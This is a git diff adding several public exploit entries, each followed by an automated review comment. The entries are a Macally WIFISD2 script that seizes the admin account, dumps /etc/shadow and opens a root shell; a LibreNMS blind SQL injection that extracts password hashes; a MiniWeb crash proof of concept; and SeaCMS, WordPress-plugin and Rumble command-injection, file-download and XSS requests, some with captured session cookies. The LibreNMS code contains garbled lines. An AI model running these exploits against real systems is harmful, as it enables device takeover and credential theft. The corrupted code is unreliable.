diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
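Review bot: `crack_root_hash()` opens `root_hash` and never closes it, and `telnet_grep_root_hash()` leaves the recovered hash in the working directory with default permissions; the header documents neither side effect. Use a context manager in both places, e.g. `with open("root_hash") as f: hash = f.read()`, and add a header comment such as `# Side effects: changes the device admin password and writes ./root_hash in the current directory`. The literal compared in `crack_root_hash()` and the password printed right after it suggest the firmware ships one fixed root credential, so owners of this model can check `/etc/shadow` for that exact entry; this is inferred from the script, not confirmed by it. The shebang also sits below the header comments and has a malformed path (`/usr/bin/env/python3`), so it has no effect.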
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
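Review bot: In `main`, the `except requests.exceptions.HTTPError` clause can never run, because the `RequestException` clause above it already catches that subclass, and its body reads `e.code`, which the requests `HTTPError` does not define. Either move it above the generic handler and report `e.response.status_code`, or drop it, since no call in the file uses `raise_for_status()`. Every request is also sent with `verify=False` while the warning is silenced at module level, so the username and password taken from argv go to an endpoint whose certificate is never checked. A comment next to `urllib3.disable_warnings(...)` such as `# TLS verification is off: intended for self-signed lab instances only` would make that choice explicit.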
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
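Review bot: The `#!/usr/bin/python` line comes after the header comments and the docstring, so it is inert, and the `print "..."` statements mean the file only parses under Python 2, which the header does not state. Add a line such as `# Requires: Python 2.7` to the header block. `import struct` is unused, and the `Host:` header is a fixed lab address (`192.168.231.140`) unrelated to `TCP_IP`, which deserves a comment so readers do not take it for a required value. The title says "Buffer Overflow" while the description only claims a daemon crash; the header should state which impact was actually observed.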
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters:ip
+
+payload:";phpinfo();//
\ No newline at end of file
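Review bot: The captured request carries what look like real session values in the `Cookie:` header (`PHPSESSID`, `t00ls`, `t00ls_s`); replace them with placeholders such as `PHPSESSID=REDACTED` before the file is archived. The same cookies appear in the 49250.txt and 49251.txt sections. The write-up also never says that the request goes to the admin directory with an authenticated session, which is the precondition a reader needs to judge severity; a header line like `# Requires: authenticated administrator session` would cover it (inferred from the admin path and the session cookie, so confirm with the author). The title names 'ip and weburl', but only `ip` is documented below.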
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters: file
+
+payload:C:/windows/system.ini
\ No newline at end of file
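Review bot: The title classifies this as "Local File Inclusion", but the request shown is `action=download&file=C:/windows/system.ini`, which reads as an arbitrary file download (file disclosure) and not as inclusion into executed code. The classification matters for triage, so the title should match what the capture demonstrates, or the text should say where inclusion happens. No response is included, so the file gives no evidence that the download succeeded; a short `# Response:` excerpt would make the report verifiable.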
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters: checkuser
+
+payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
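Review bot: The payload in the request body and the payload stated at the end do not match: the body encodes `alert(1)` while the `payload:` line shows `alert(document.cookie)`. The file should show one payload consistently, and it should say on which page the stored `checkuser` value is later rendered, since that is what makes the issue stored and not reflected. The `User-Agent:` header is also wrapped onto a second line (`Gecko/20100101 Firefox/83.0`), which makes the capture an invalid HTTP request as written.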
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
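Review bot: The file ends with `--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--`, which looks like a MIME multipart boundary left over from the e-mail submission, and the `php_uname` value is split as `x=` / `86_64` by what appears to be a quoted-printable soft line break. Drop the boundary line and rejoin the value as `x86_64` so the sample output reads as one string. The header gives no fixed version or vendor advisory; if one exists, it belongs next to `# Version: 1.14.9` so site owners know what to upgrade to.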
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1:2580/settings
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+
+save=true&runas=root&servername=%3Cscript%3Ealert%28%22xss.com%22%29%3C%2Fscript%3E&forceipv4=1&bindtoaddress=0.0.0.0&messagesizelimit=104857600&mailpath=C%3A%2FProgram+Files%2FRumble%2Fstorage&dbpath=db&radio=sqlite3&smtp=1&smtpport=25&pop3=1&pop3port=110&imap4=1&imap4port=143&deliveryattempts=5&retryinterval=360&Save+settings=Save+settings
+HTTP/1.1 302 Moved
+Location: /settings:save
+
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on <script>alert(xss.com)</script><br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
